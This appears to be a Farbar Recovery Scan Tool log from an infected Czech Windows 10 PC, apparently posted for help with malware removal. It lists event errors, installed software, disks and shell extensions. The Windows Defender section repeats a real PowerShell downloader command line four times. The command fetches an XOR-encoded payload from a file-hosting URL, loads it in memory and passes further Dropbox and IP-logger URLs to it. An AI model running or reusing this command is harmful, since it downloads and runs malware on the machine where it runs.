Description: Služba Služba Windows Media Player Network Sharing byla nečekaně ukončena. Stalo se to 1 krát. Následující opravná akce bude spuštěna za 30000 milisekund: Restartovat službu.
Error: (01/20/2021 04:59:25 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Služba VIA Karaoke digital mixer Service byla neočekávaně ukončena. Tento stav nastal již 1krát.
Windows Defender:
===================================
Date: 2021-01-20 19:28:36.8570000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2538.0, AS: 1.329.2538.0, NIS: 1.329.2538.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 18:14:17.7510000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2534.0, AS: 1.329.2534.0, NIS: 1.329.2534.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 17:09:21.2090000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2528.0, AS: 1.329.2528.0, NIS: 1.329.2528.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
Date: 2021-01-20 15:18:54.2110000Z
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {5BABBB36-9445-4077-8621-59FC0CF7C04A}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM
Date: 2021-01-20 11:15:09.7920000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4
==================== Memory info ===========================
BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 90%
Total physical RAM: 3767.05 MB
Available physical RAM: 356.34 MB
Total Virtual: 7351.05 MB
Available Virtual: 3556.64 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:111.19 GB) (Free:62.69 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32
\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
==========================================================
Disk: 3 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)
==================== End of Addition.txt =======================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 19:46:07)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]
==================== Shortcuts & WMI ========================
==================== Loaded Modules (Whitelisted) =============
